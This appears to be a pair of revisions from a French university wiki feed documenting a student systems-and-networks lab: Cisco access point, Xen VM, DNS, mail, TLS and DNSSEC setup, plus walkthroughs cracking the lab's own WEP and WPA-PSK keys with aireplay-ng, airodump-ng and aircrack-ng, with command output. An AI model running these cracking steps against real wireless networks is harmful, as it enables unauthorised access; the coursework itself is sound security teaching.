&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35660</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35660"/>
				<updated>2016-12-06T11:11:13Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Récapitulatif des IP &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN20 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN21 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN22 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN23 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN25 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
